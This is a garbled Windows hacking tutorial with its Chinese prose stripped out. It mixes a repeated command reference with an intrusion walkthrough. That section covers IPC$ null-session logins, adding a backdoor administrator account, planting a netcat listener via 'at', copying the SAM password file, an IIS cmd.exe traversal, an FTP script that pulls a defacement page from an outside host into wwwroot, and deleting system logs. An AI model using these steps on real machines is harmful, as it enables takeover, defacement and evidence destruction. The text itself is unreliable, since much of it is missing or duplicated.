
Cracker Hacker




rfc




IP


1
2
3

4
5


ftppingnet

tcp/ip

C asp cgi
htm

phpjava

C htm

wuftpApache

QQ QQ

3windows
4 CMD ASP PHP JAVA

5 BBS X
6

**

**
7

8 QQ
9
10

()
1 IPC
windows
2 windows ,windows

3basic ,,

4 (, ),

sql NBSI.

,,
windows

,.
........ ,

2000 (),
,

().
,., Di~~~
,....:

,, blog,,,(

),.
.
: ( :windows2000 ,VPN
,windows_HOME XP "" IIS......)

E
3

1:cmd
2cmd
.bat

:cmd,

IPC$

cmd
cmd

cmd and
cmd "/?" ping ping /?

google
google
pass:^_^
Enjoy it !
4
DOS
dir deltree cls cd
copy diskcopy del format
edit mem md move
more type rd sys DOS
ren xcopy chkdsk attrib

fdisk date label defrag

msd path share memmaker

help restore set time


tree debug doskey DOS prempt
undelete scandisk
DOS
diskcomp append
expand DOS fasthelp
fc interink
setver intersvr
subst qbasic Basic
vsafe unformat
ver DOS smartdrv
vol lh

ctty emm386
:
Dir

? **
*.
., dir *.exe
dir .exe
/p

/w
5
/s
win

dir *.* -> a.txt a.txt


dir *.* /s -> a.txt a.txt

Attrib


attrib
+r

-r

+a

-a

+s

-s

+h

-h

Cls

Exit

format

/q

/q
Ipconfig
TCP/IP (DHCP)
(DNS) ipconfig IP

/all
TCP/IP
ipconfig

winipcfg ME98 95 Windows XP


winipcfg IP

IP
TCP/IP DHCP IP (APIPA)
md

Move

Nbtstat
TCP/IP (NetBT) NetBIOS

NetBIOS NetBIOS Nbtstat NetBIOS


Windows Internet (WINS) nbtstat
Nbtstat
-a remotename
NetBIOS RemoteName

NetBIOS
-A IPAddress
NetBIOS IP

Netstat
TCP IP IPv4

IPICMPTCP UDP IPv6

IPv6ICMPv6 IPv6 TCP


IPv6 UDP netstat TCP
-a
TCP TCP UDP

Ping
(ICMP)
TCP/IP

IP

Ping TCP/IP
ping Ip

-t
ping
CTRL-BREAK ping CTRL-C
-l Size

32size 65,527
Rename (Ren)

ren *.abc *.cba


Set
set

Shutdown
shutdown

-m ComputerName

-t xx
xx 20
-l
-m ComputerName
-s

-r


-a
-l ComputerName
-a
System File Checker (sfc)
win
/scannow

/scanonce

/purgecache
Windows

/cachesize=x
Windows MB
type
type

bat
Tree

Xcopy

/s
/sxcopy

/e

copy

del

ftp bat net telnet

1.
ping -t 192.168.10.88
2.DNSIPMac
A.Win98winipcfg
B.Win2000 ipconfig /all
C.NSLOOKUP DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 DNS 41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com
Address: 202.99.160.212
3.
Net send

/IP|* ()
net stop messenger
net start messenger
4.
ping a IP t NetBios
nbtstat -a 192.168.10.146
5.netstat -a
netstat -s -e TCPUDPICMP IP

6. arp
IP MAC

arp -a
7.

IP MAC IP
arp -s 192.168.10.59 00-50-ff-6c-08-75
IP MAC
arp -d IP
8.
net config server /hidden:yes
net config server /hidden:no
9. net
A. net view

IP
C:\>net view 192.168.10.8
192.168.10.8

------------------------------------- Disk

B. net user
C. net use
net use z: \\192.168.10.8\movie IP movie
Z
D. net session

C:\>net session


------------------------------------------------------------------------------
\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39

10.
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 325S

11.
A. net share
B.
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
$
C.
c:\>net share mymovie=e:\downloads\movie /users:1
mymovie
1

12. DOS IP
A. IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "" static IP mask gateway
B.IP
interface ip>show address
Arp
" (ARP)" ARP

IP

arp

arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [-d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

-a [InetAddr] [-N IfaceAddr]


ARP IP ARP

InetAddr

arp -a

InetAddr IP
ARP -N IfaceAddr

IfaceAddr
IP -N
-g [InetAddr] [-N IfaceAddr]
-a

-d InetAddr [IfaceAddr]
IP InetAddr IP
IfaceAddr

IfaceAddr IP
(*) InetAddr
-s InetAddr EtherAddr [IfaceAddr]
ARP IP InetAddr EtherAddr
ARP IfaceAddr

IfaceAddr IP
/?

InetAddr IfaceAddr IP
EtherAddr
00-AA-00-4F-2A-9C
-s ARP
TCP/IP ARP
arp

""
(TCP/IP)

ARP
arp -a
IP 10.0.0.99 ARP
arp -a -N 10.0.0.99
IP 10.0.0.80 00-AA-00-4F-2A-9C ARP
arp -s 10.0.0.80 00-AA-00-4F-2A-9C
13.At
at

" "
at

at [\\ComputerName] [{[ID] [/delete]|/delete [/yes]}]


at [\\ComputerName] hours:minutes [/interactive] [{/every:date[,...]|/next:date[,...]}] command

\\computername
at
ID

/delete
ID

/yes
""
hours:minutes
24

00:00 [] 23:59 :

/interactive
command , command

/every:

command

date

MTWThFSSu 1 31
date at
/next:
command
command
Windows

.exe .com .bat


.cmd

(UNC)
/?

Schtasks at

schtasks at
schtasks "

"
at
at Administrators

Cmd.exe

At Cmd.exe
(.exe) Cmd.exe
cmd /c dir > c:\test.out

at
Status ID Day Time Command Line
OK 1 Each F 4:30 PM net send group leads status due

OK 2 Each M 12:00 AM chkstor > check.file


OK 3 Each F 11:59 PM backup2.bat

(ID)
(ID) at

Task ID1
Status:OK
Schedule:Each F
Time of Day:4:30 PM
Command:net send group leads status due at
at
"

"

at
(>)
at
(^) Output.text

at 14:45 c:\test.bat ^>c:\output.txt

systemroot

at
at at

" "

" "

UNC
at 1:00pm my_backup \\server\share
x: ?
at 1:00pm my_backup x:
at
at

Marketing
at \\marketing

Corp 3
at \\corp 3
8:00 Corp
Maintenance Corp.txt Reports
at \\corp 08:00 cmd /c "net share reports=d:\marketing\reports >> \\maintenance\reports\corp.txt"
Marketing
Archive.cmd

at \\marketing 00:00 /every:5,10,15,20,25,30 archive


at
at /delete
(.exe)
cmd /c Cmd.exe
cmd /c dir > c:\test.out
14.Rsh
RSH Windows XP Windows 2000
RSH Windows 2000 Server Resource Kit Rshsvc.exe
RSH

rsh

rsh [Host] [-l UserName] [-n] [Command]

Host
command

-l UserName

-n
rsh NULL
Command

/?

rsh command

command
command Rsh

">
>"
"RemoteFile""LocalFile"
rsh othercomputer cat remotefile >> localfile

Remotefile otherremotefile
rsh othercomputer cat remotefile ">>" otherremotefile
rsh
Windows XP Professional

rsh

.rhosts
.rhosts UNIX

.rhosts
.rhosts

rcprexec rsh
.rhosts

(#)
host7 #This computer is in room 31A
.rhosts

.rhosts

(TCP/IP)

admin1

vax1 telcon
rsh vax1 -l admin1 telcon
15.Tftp
(TFTP) daemon
UNIX (TFTP) daemon
UNIX

tftp [-i] [Host] [{get | put}] [Source] [Destination]

-i

-i
ASCII (EOL)

Host

put
Destination Source
TFTP


get
Destination Source
Source

Destination
Destination Source

/?

get

FileTwo
FileOne put FileTwo
FileOne get
Windows XP Windows 2000 TFTP Windows
2000 TFTP Windows XP Windows 2000

(TCP/IP)

Users.txt vax1
Users19.txt
tftp vax1 put users.txt users19.txt
16.Nbtstat
TCP/IP (NetBT) NetBIOS

NetBIOS NetBIOS Nbtstat NetBIOS


Windows Internet (WINS) nbtstat

nbtstat [-a RemoteName] [-A IPAddress] [-c] [-n] [-r] [-R] [-RR] [-s] [-S] [Interval]

-a remotename
NetBIOS RemoteName

NetBIOS NetBIOS
NetBIOS
-A IPAddress
NetBIOS IP

-c
NetBIOS NetBIOS
-n
NetBIOS Registered
WINS
-r
NetBIOS WINS Windows XP
WINS
-R
NetBIOS Lmhosts

#PRE
-RR
WINS NetBIOS
-s
NetBIOS IP
-S
NetBIOS IP
Interval
Interval
CTRL+C netstat

/?

Nbtstat
Nbtstat
Input
Output
In/Out

Lift
Local Name NetBIOS
Remote Host IP
<03> NetBIOS NetBIOS
16
<20>
ASCII
Type
Status NetBIOS ""

""
State NetBIOS
NetBIOS

IP


IP

TCP

(TCP/IP)

NetBIOS

CORP07

NetBIOS
nbtstat -a CORP07
IP 10.0.0.99

NetBIOS
nbtstat -A 10.0.0.99
NetBIOS
nbtstat -n
NetBIOS
nbtstat -c
NetBIOS Lmhosts

#PRE

nbtstat -R
WINS NetBIOS
nbtstat -RR

5 IP NetBIOS
nbtstat -S 5
17.Netstat
TCP IP IPv4

IPICMPTCP UDP IPv6

IPv6ICMPv6 IPv6 TCP


IPv6 UDP netstat TCP

netstat [-a] [-e] [-n] [-o] [-p Protocol] [-r] [-s] [Interval]

-a
TCP TCP UDP

-e
-s

-n
TCP

-o
TCP

ID (PID) Windows

"

"

PID -a-n -p

-p Protocol
Protocol Protocol
tcpudptcpv6 udpv6 -s
Protocol tcpudpicmpiptcpv6udpv6icmpv6 ipv6
-s
TCP UDPICMP IP
Windows XP IPv6

IPv6

TCPIPv6 UDPICMPv6 IPv6

-p
-r
IP route print

Interval
Interval CTRL+C
netstat
/?

(-) (/)
Netstat
Proto
TCP UDP
Local Address

IP -n IP
*

Foreign Address
IP -n
IP *
(state)
TCP
CLOSE_WAIT
CLOSED
ESTABLISHED
FIN_WAIT_1
FIN_WAIT_2
LAST_ACK
LISTEN
SYN_RECEIVED
SYN_SEND
TIMED_WAIT
TCP RFC 793
(TCP/IP)

netstat -e -s

TCP UDP
netstat -s -p tcp udp

5 TCP

ID
netstat -o 5
TCP

ID
netstat -n -o

18.Runas

runas [{/profile|/noprofile}] [/env] [/netonly] [/smartcard] [/showtrustlevels] [/trustlevel] /user:UserAccountName program

/profile
/profile

/no profile
/noprofile

/env

/netonly

/smartcard
/smartcard
/showtrustlevels
/trustlevel
/trustlevel
/showtrustlevels

/user:UserAccountName

user@domain domain\user

/user
/?

runas

runas "

"
runas Administrator Administrator
runas MMC
"

"
Administrator /user:

/user:AdministratorAccountName@ComputerName
/user:ComputerName\AdministratorAccountName

/user:AdministratorAccountName@DomainName
/user:DomainName\AdministratorAccountName
runas (*.exe) MMC (*.msc) MMC
"

""Users""Power Users"

runas MMC "

"
MMC "
".
runas

runas MMC "

"

"

" Windows 2000


runas
runas

RunAs RunAs

"

"

""""

Windows 2000

runas /user:localmachinename\administrator cmd

companydomain\domainadmin "

"
runas /user:companydomain\domainadmin "mmc %windir%\system32\compmgmt.msc"

domain.microsoft.com user ""

runas /user:user@domain.microsoft.com "notepad my_file.txt"

MMC

runas /netonly /user:domain\username "command"


domain\username

19.Route
IP route

route [-f] [-p] [Command [Destination] [mask Netmask] [Gateway] [metric Metric]] [if Interface]]

-f
255.255.255.255

127.0.0.0 255.255.255.0
224.0.0.0 240.0.0.0

addchange delete
-p
add TCP/IP
IP TCP/IP print

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\PersistentRoutes
Command

add
change
delete
print

Destination
IP
0 IP
0.0.0.0
mask subnetmask

IP 255.255.255.255

0.0.0.0 255.255.255.255

0 1
Gateway

IP IP

IP
metric Metric

1 ~ 9999

if Interface
route print

0x if

/?

TCP/IP LAN IP

LAN
TCP/IP
systemroot\System32\Drivers\Etc
Destination"" (DNS)
IP
Gateway DNS systemroot\System32\Drivers\Etc
NetBIOS
print delete Gateway
Destination (*) (*)

(?)
10.*.1, 192.168.* 127.* *224*

"Route: bad gateway address netmask" 1

1 0
1
Windows NT 4.0Windows 2000Windows Millennium Edition
Windows XP route -p

Windows 95 Windows 98 route

(TCP/IP)

IP
route print
IP

10.
route print 10.*
192.168.12.1
route add 0.0.0.0 mask 0.0.0.0 192.168.12.1
10.41.0.0 255.255.0.0
10.27.0.1
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1
route -p add 10.41.0.0 mask 255.255.0.0 10.27.0.1
10.41.0.0 255.255.0.0
10.27.0.1

7
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 metric 7
10.41.0.0 255.255.0.0
10.27.0.1 0x3
route add 10.41.0.0 mask 255.255.0.0 10.27.0.1 if 0x3
10.41.0.0 255.255.0.0
route delete 10.41.0.0 mask 255.255.0.0

IP

10.
route delete 10.*
10.41.0.0 255.255.0.0
10.27.0.1 10.27.0.25
route change 10.41.0.0 mask 255.255.0.0 10.27.0.25
windowsserver cmd ip -> Windows 2k/2003
Server
ip
Windows2000

Unix ip

C:\>ipconfig (ipconfig ip )
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .:
IP Address............: 10.1.1.94 ip
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254
C:\>netsh
netsh>interface
interface>ip
interface ip>set address " " static 10.1.1.111 255.255.255.0 10.1.1.254
interface ip>exit
set :
set address - IP
set dns - DNS
set wins - WINS

IPCONFIG

C:\>ipconfig ipconfig

,
Windows 2000 IP Configuration
Ethernet adapter :
Connection-specific DNS Suffix .
IP Address............: 10.1.1.111
Subnet Mask ...........: 255.255.255.0
Default Gateway .........: 10.1.1.254

..-
? -
aaaa - `aaaa'
abort -
add -
alias -
bye -
commit -
delete -
dhcp - `dhcp'
dump -
exec -
exit -
help -
interface - `interface'
offline -
online -
popd -
pushd -
quit -
ras - `ras'
routing - `routing'

set -
show -
unalias -
wins - `wins'
IP

IP Win2000 IP Win98

IP
IP
?
Win2000 netsh

" "

"cmd" netsh
netsh

int ip

IP dump IP

C:\Documents and Settings\Administrator>netsh


netsh>
netsh>int ip
interface ip>dump
# ----------------------------------
# IP
# ----------------------------------
pushd interface ip

# IP
set address name = source = static addr = 192.168.0.5 mask = 255.255.255.0
set address name = gateway = 192.168.0.2 gwmetric = 1
set dns name = source = static addr = 61.237.17.181
add dns name = addr = 211.97.168.129
add dns name = addr = 211.98.4.1

set wins name = source = static addr = none


# 2 IP
set address name = 2 source = dhcp
set dns name = 2 source = dhcp
set wins name = 2 source = dhcp
popd
# IP
IP 2
netsh IP "set address name = source=static addr=IP mask="

netsh IP 192.168.0.7
255.255.255.0
C:\Documents and Settings\Administrator>netsh
netsh>int ip
interface ip>set address name = " " source = static addr = 192.168.0.7 mask = 255.255.255.0

interface ip>exit
ipconfig
C:\Documents and Settings\Administrator>ipconfig
Windows 2000 IP Configuration
Ethernet adapter 2
Media State ........... Cable Disconnected
Ethernet adapter
Connection-specific DNS Suffix .
IP Address............ 192.168.0.7
Subnet Mask ........... 255.255.255.0
Default Gateway ......... 192.168.0.2
Win2000

IP IP

int ip
set address name= source=static addr=192.168.0.7 mask=255.255.255.0
"7.sh" C C
"netsh exec 7.sh" ? ipconfig

IP

"7.bat" "netsh exec 7.sh" IP
192.168.0.5192.168.0.7

IP
"addr" IP
172.19.96.7

IP

int ip
set address name = source = static addr = 172.19.96.7 mask = 255.255.255.0
set address name = gateway = 172.19.96.1 gwmetric = 1

ipconfig/all

IP ?
netstat
netstat TCP/IP netstat -a

netstat -r netstat -e

Ethernet

netstat -s netstat -n

Tracert IP
Tracert IP (TTL) ICMP

-d IP
-h maximum_hops target_name

-j host-list Tracert
-w timeout timeout
target_name IP
pathping

ping tracert

pathping

-n Hostnames
-h Maximum hops
-g Host-list
-p Period ping
-q Num_queries

-w Time-out
-T Layer 2 tag 2 IEEE 802.1p
2
-T
(QoS)

-R RSVP test Che "


(RSVP)" -R

(QoS)

DHCP

netsh
netsh>(Netshell) "dhcp"
dhcp> DHCP
server \\servername server ip_address

" servername

"

DHCP Netshell

/? help

DHCP list DHCP

Netshell

route
routing ip add/delete/set/show interface
IP
routing ip add/delete/set/show filter
IP
routing ip add/delete/show boundary

routing ip add/set ipiptunnel IP


IP
routing ip add/delete/set/show rtmroute

routing ip add/delete/set/show persistentroute

routing ip add/delete/set/show preferenceforprotocol

routing ip add/delete/set/show scope


routing ip set/show loglevel IP
routing ip show helper IP Netsh

routing ip show protocol IP


routing ip show mfe
routing ip show mfestats
routing ip show boundarystats IP
routing ip show rtmdestinations
routing ip show rtmroutes
routing ip nat set/show global (NAT)

routing ip nat add/delete/set/show interface


NAT
routing ip nat add/delete addressrange NAT


routing ip nat add/delete addressmapping NAT

routing ip nat add/delete portmapping NAT

routing ip autodhcp set/show global DHCP

routing ip autodhcp set/show interface


DHCP
routing ip autodhcp add/delete exclusion DHCP

routing ip dnsproxy set/show global DNS

routing ip dnsproxy set/show interface DNS

routing ip igmp set/show global IGMP


routing ip igmp add/delete/set/show interface
IGMP
routing ip igmp add/delete staticgroup

routing ip igmp show grouptable IGMP

routing ip igmp show ifstats IGMP

routing ip igmp show iftable IGMP

routing ip igmp show proxygrouptable IGMP

IGMP

routing ip igmp show rasgrouptable


Internet

routing ip ospf set/show global OSPF


routing ip ospf add/delete/set/show interface
OSPF
routing ip ospf add/delete/set/show area
OSPF
routing ip ospf add/delete/show range OSPF


routing ip ospf add/delete/set/show virtif
OSPF
routing ip ospf add/delete/show neighbor
OSPF
routing ip ospf add/delete/show protofilter
OSPF
routing ip ospf add/delete/show routefilter
OSPF
routing ip ospf show areastats OSPF

routing ip ospf show lsdb OSPF


routing ip ospf show virtifstats OSPF
routing ip relay set global "DHCP "
routing ip relay add/delete/set interface
"DHCP "
routing ip relay add/delete dhcpserver DHCP
DHCP IP
routing ip relay show ifbinding IP
routing ip relay show ifconfig "DHCP
"
routing ip relay show ifstats DHCP

routing ip rip set/show global IP RIP


routing ip rip add/delete/set/show interface
IP RIP
routing ip rip add/delete peerfilter RIP

routing ip rip add/delete acceptfilter


RIP
routing ip rip add/delete announcefilter
RIP
routing ip rip add/delete/show neighbor RIP

routing ip rip set/show flags IP RIP


routing ip rip show globalstats RIP

routing ip rip show ifbinding IP


routing ip rip show ifstats RIP

IPX netsh
routing ipx add/set staticroute IPX IPX
routing ipx add/set staticservice SAP SAP

routing ipx add/set filter IPX


routing ipx add/set interface IPX
IPX
routing ipx set global IPX
routing ipx rip add/set filter RIP
routing ipx rip set global IPX RIP
routing ipx rip set interface IPX RIP
routing ipx sap add/set filter SAP
routing ipx sap set global IPX SAP
routing ipx sap set interface IPX SAP
routing ipx netbios add nbname NETBIOS IPX
NetBIOS
routing ipx netbios set interface IPX
NetBIOS
WINS NetSh
list WINS

dump WINS
add name add name /?
add partner add partner /?
add pngserver Persona Non Grata
add pngserver /?
check database check

database /?
check name WINS
check name /?
check version check
version /?
delete name
delete name /?
delete partner
delete partner /?
delete records
delete records /?
delete owners delete
owners /?
delete pngserver Persona Non Grata
delete pngserver /?
init backup WINS init backup /?
init import Lmhosts init import /?
init pull "" WINS
init pull /?
init pullrange WINS
init pullrange /?
init push "" WINS
init push /?
init replicate init
replicate /?
init restore init restore /?
init scavenge WINS init
scavenge /?
init search WINS init search /?
reset statistics reset

statistics /?
set autopartnerconfig
set autopartnerconfig /?
set backuppath set
backuppath /?
set burstparam set
autopartnerconfig /?
set logparam set
logparam /?
set migrateflag set
migrateflag /?
set namerecord set
namerecord /?
set periodicdbchecking
set periodicdbchecking /?
set pullpartnerconfig ""
set pullpartnerconfig /?
set pushpartnerconfig ""
set pushpartnerconfig /?
set pullparam " " set
pullparam /?
set pushparam " " set
pushparam /?
set replicateflag set
replicateflag /?
set startversion ID set
startversion /?
show browser [1Bh]
show browser /?
show database

show database /?
show info show info /?
show name show
name /?
show partner """"

""
show partner /?
show partnerproperties show
partnerproperties /?
show pullpartnerconfig ""
show pullpartnerconfig /?
show pushpartnerconfig ""
show pushpartnerconfig /?
show reccount
show reccount /?
show recbyversion
show recbyversion /?
show server show server /?
show statistics WINS show
statistics /?
show version WINS
show version /?
show versionmap ID ""
show versionmap /?
Interface
interface set/show interface

interface set/show credentials

1NET

IP IPC$
hbx 123456 IP 127.0.0.1
net use \\127.0.0.1\ipc$ 123456 /user:hbx null

net use \\127.0.0.1\ipc$ /delete


net share
net share me=c:\winnt\system32
me winnt
system32 win2000
net share me /delete
..
SA .
heibai

lovechina
net user heibai lovechina /add
Administrator

.
net localgroup Administrators heibai /add
\* C .
C \* Z .
net use z: \\127.0.0.1\c$
net start telnet
TELNET .
Guest

guest NT
2000
net user guest /active:yes( :
guest )
net user guest /active:no guest

guest lovechina

net user guest lovechina

net localgroup administrators guest /add


guest administrator
net net view
net user

net user

/delete ,,

, net
localgroup
administrators , administrator

net user
administrator
del................
2:at

AT

net time \\127.0.0.1


12:1

ID=1
at \\127.0.0.1 12:3 nc.exe
NC.EXE.
NCNC NETCAT .
TELNET

99.

12:3

99

..
at ,

:
C:\> AT 22:30 Start C:\prettyboy.mp3

ID = 1 [

22:30
]
3:telnet

.
telnet 127.0.0.1 99
99

.
.
4:FTP
, FTP ,

,, WWW.51.NET,.,,
FTP .
FTP WWW.51.NET,

HUCJS,
654321
ftpwww.51.net
,.
---------------------, INDEX.HTM, C:\, D:\
get c:\index.htm d:\
C INDEX.HTM,

D
put c:\index.htm d:\
5:copy
IPC$
C index.htm 127.0.0.1 C
copy index.htm \\127.0.0.1\c$\index.htm
D C D
copy index.htm \\127.0.0.1\d$\index.htm
WINNT

copy index.htm \\127.0.0.1\admin$\index.htm

admin$ winnt
NT
x:\winnt\repair\sam._ sam._
127.0.0.1 C
copy \\127.0.0.1\admin$\repair\sam._ c:\
6set

80 SET

COMPUTERNAME=PENTIUMII
ComSpec=D:\WINNT\system32\cmd.exe
CONTENT_LENGTH=0
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=*/*
HTTP_ACCEPT_LANGUAGE=zh-cn
HTTP_CONNECTION=Keep-Alive
HTTP_HOST= IP IP
HTTP_ACCEPT_ENCODING=gzipdeflate
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
NUMBER_OF_PROCESSORS=1
Os2LibPath=D:\WINNT\system32\os2\dll;
OS=Windows_NT
Path=D:\WINNT\system32;D:\WINNT
PATHEXT=.COM;.EXE;.BAT;.CMD
PATH_TRANSLATED=E:\vlroot
PATH_TRANSLATED= E:\vlroot
PROCESSOR_ARCHITECTURE=x86
PROCESSOR_IDENTIFIER=x86 Family Model Stepping 3GenuineIntel
PROCESSOR_LEVEL=6
PROCESSOR_REVISION=0303
PROMPT=$P$G
QUERY_STRING=/c+set
REMOTE_ADDR=XX.XX.XX.XX
REMOTE_HOST=XX.XX.XX.XX
REQUEST_METHOD=GET
SCRIPT_NAME=/scripts/..%2f../winnt/system32/cmd.exe
SERVER_NAME=XX.XX.XX.XX
SERVER_PORT=80
SERVER_PORT_SECURE=0
SERVER_PROTOCOL=HTTP/1.1
SERVER_SOFTWARE=Microsoft-IIS/3.0 IIS/3.0
SystemDrive=D:
SystemRoot=D:\WINNT
TZ=GMT-9
USERPROFILE=D:\WINNT\Profiles\Default User
windir=D:\WINNT

100% DIR

XX.XX.XX.XX/ XX.XX.XX.XX

7nbtstat
NT 136 139
netbios

NT

nbtstat -A XX.XX.XX.XX
-A

net use \\ IP
net view \\ IP
net use X: \\IP\ \* X
139
netstat -n
----------------
NetBIOS Remote Machine Name Table

Name                Type         Status
---------------------------------------------
PENTIUMII      <00>  UNIQUE      Registered
PENTIUMII      <20>  UNIQUE      Registered
ORAHOTOWN      <00>  GROUP       Registered
ORAHOTOWN      <1C>  GROUP       Registered
ORAHOTOWN      <1B>  UNIQUE      Registered
PENTIUMII      <03>  UNIQUE      Registered
INet~Services  <1C>  GROUP       Registered
IS~PENTIUMII...<00>  UNIQUE      Registered
ORAHOTOWN      <1E>  GROUP       Registered
ORAHOTOWN      <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-E0-29-14-35-BA


<03> .
PENTIUMII
03 :MAC IP
8Shutdown
NT
shutdown \\IP /t:20
20 NT

Telnet
shutdown -m \\

9DIR

10echo
Unicode

index.htm 2
echo >index.htm
echo >>index.htm
index.htm
index.htm

index.htm
>> >

2echo txt chinren


open upload.chinaren.com

FTP

cnhack
test
get index.htm c:\inetpub\wwwroot\index.htm
index.htm

c:\inetpub\wwwroot\index.htm
bye FTP 98 DOSEXIT DOS

echo open upload.chinaren.com> c:\cnhack.txt


echo cnhack >> c:\cnhack.txt
echo 39abs >> c:\cnhack.txt

echo

get

index.htm

c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
ftp -s:c:\cnhack.txt

ftp -s

cnhack.txt

del c:\cnhack.txt
11:attrib

attrib -r index.htm
index.htm

-+
---------------------
attrib +r index.htm
index.htm
12:del

127.0.0.1

NT
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
NT

D C

6
1
net use \\IP\ipc$ "" /user:""
ipc$
NT
everyone 2000

2. IPC$
1. nt/2000/xp ipc$ 98/me

2. net use \\IP\ipc$ " " /user:" "

""
3
5
51Windows :

53

ip lanmanserver


67

lanmanworkstation ipc$
1219

ipc$

1326

1792

NetLogon

2242

4 ipc$

shell
5 IPC$
ipc$ shell sql cmd telnet
shell admin

shell net share ipc$


ipc$ipc$
net

6
net use z: \\IP\c$ "" /user:""
c z

ipc$ IP $ copy
muma.exe \IPd$pathmuma.exe
net use y: \IPd$ copy muma.exe y:pathmuma.exe
""
7 ipc$
net use \\IP\ipc$ /del ipc$
net use z: /del z
net use * /del y
8 ipc$
ipc$

pstools
Win2000SrvReskittelnethack

tftpftp dwrccVNCRemoteAdmin
2000server

9 ips$
A ipc$

1
net share ipc$ /del
net share admin$ /del
net share c$ /del

regedit

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]

RestrictAnonymous DWORD 00000002
3

server

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] AutoShareServer DWORD:00000000

pro

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] AutoShareWks DWORD:00000000

B ipc$
net stop lanmanserver
XXX
lanmanserver y

C ipc$
ipc$
D
7
DOS
dir deltree cls cd
copy diskcopy del format
edit mem md move
more type rd sys DOS
ren xcopy chkdsk attrib

fdisk date label defrag

msd path share memmaker

help restore set time


tree debug doskey DOS prempt
undelete scandisk
DOS
diskcomp append
expand DOS fasthelp
fc interink
setver intersvr
subst qbasic Basic
vsafe unformat
ver DOS smartdrv
vol lh

ctty emm386
:
Dir


? **
*.
., dir *.exe
dir .exe
/p

/w
5
/s
win

dir *.* -> a.txt a.txt


dir *.* /s -> a.txt a.txt

Attrib

attrib
+r

-r

+a

-a

+s

-s

+h

-h


Cls

Exit

format

/q

/q
Ipconfig
TCP/IP (DHCP)
(DNS) ipconfig IP

/all
TCP/IP
ipconfig

winipcfg ME98 95 Windows XP


winipcfg IP

IP
TCP/IP DHCP IP (APIPA)
md

Move

Nbtstat
TCP/IP (NetBT) NetBIOS

NetBIOS NetBIOS Nbtstat NetBIOS


Windows Internet (WINS) nbtstat

Nbtstat
-a remotename
NetBIOS RemoteName

NetBIOS
-A IPAddress
NetBIOS IP

Netstat
TCP IP IPv4

IPICMPTCP UDP IPv6

IPv6ICMPv6 IPv6 TCP


IPv6 UDP netstat TCP
-a
TCP TCP UDP

Ping
(ICMP)
TCP/IP

IP

Ping TCP/IP
ping Ip

-t
ping
CTRL-BREAK ping CTRL-C
-lSize

32size 65,527
Rename (Ren)

ren *.abc *.cba


Set
set


Shutdown
shutdown

-m ComputerName

-t xx
xx 20
-l
-m ComputerName
-s

-r

-a
-l ComputerName
-a
System File Checker (sfc)
win
/scannow

/scanonce

/purgecache
Windows

/cachesize=x
Windows MB
type
type

bat
Tree


Xcopy

/s
/sxcopy

/e

copy

del

ftp bat net telnet

1.
ping 192.168.10.88 t t
2.DNSIPMac
A.Win98winipcfg
B.Win2000 Ipconfig/all
C.NSLOOKUP DNS
C:\>nslookup
Default Server: ns.hesjptt.net.cn
Address: 202.99.160.68
>server 202.99.41.2 DNS 41.2
> pop.pcpop.com
Server: ns.hesjptt.net.cn
Address: 202.99.160.68
Non-authoritative answer:
Name: pop.pcpop.com

Address: 202.99.160.212
3.
Net send

/IP|* ()
net stop messenger
net start messenger
4.
ping a IP t NetBios
nbtstat -a 192.168.10.146
5.netstat -a
netstat -s -e TCPUDPICMP IP

6. arp
IP MAC
arp -a
7.

IP MAC IP
ARP s 192.168.10.59 0050ff6c0875
IP MAC
arp -d IP
8.
net config server /hidden:yes
net config server /hidden:no
9. net
A. net view

IP
C:\>net view 192.168.10.8
192.168.10.8

--------------------------------------

Disk

B. net user
C. net use
net use z: \\192.168.10.8\movie IP movie
Z
D. net session

C:\>net session


------------------------------------------------------------------------------\\192.168.10.110 ROME Windows 2000 2195 0 00:03:12
\\192.168.10.51 ROME Windows 2000 2195 0 00:00:39

10.
A.tracert pop.pcpop.com
B.pathping pop.pcpop.com 325S

11.
A. net share
B.
net share c$ /d
net share d$ /d
net share ipc$ /d
net share admin$ /d
$
C.
c:\net share mymovie=e:\downloads\movie /users:1
mymovie
1

12. DOS IP
A. IP
CMD
netsh
netsh>int
interface>ip
interface ip>set add "" static IP mask gateway
B.IP
interface ip>show address
Arp
" (ARP)" ARP

IP

arp

arp [-a [InetAddr] [-N IfaceAddr]] [-g [InetAddr] [-N IfaceAddr]] [d InetAddr [IfaceAddr]] [-s InetAddr EtherAddr [IfaceAddr]]

-a [InetAddr] [-N IfaceAddr]


ARP IP ARP

InetAddr

arp -a

InetAddr IP
ARP -N IfaceAddr

IfaceAddr
IP -N
-g [InetAddr] [-N IfaceAddr]
-a

-d InetAddr [IfaceAddr]
IP InetAddr IP
IfaceAddr

IfaceAddr IP
(*) InetAddr
-s InetAddr EtherAddr [IfaceAddr]

ARP IP InetAddr EtherAddr


ARP IfaceAddr

IfaceAddr IP
/?

